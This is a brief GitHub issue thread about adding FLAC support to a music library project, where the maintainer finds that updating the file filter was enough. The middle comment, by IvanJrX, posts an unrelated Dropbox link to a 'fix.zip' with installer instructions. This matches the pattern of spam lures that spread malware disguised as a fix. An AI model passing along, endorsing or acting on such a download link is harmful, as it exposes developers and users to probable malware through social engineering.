### ISSUE TITLE
Add Flac Support

### ISSUE THREAD

**Issue by aMytho** [aMytho/osse#17]
Our library supports flac files. We need to update the filter and add a custom extractor for other tags.

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by aMytho** [comment]
I added the flac to the file filter and it all worked. Turns out flacs use the same tagging format as ogg files. 

I feel PRODUCTIVE!
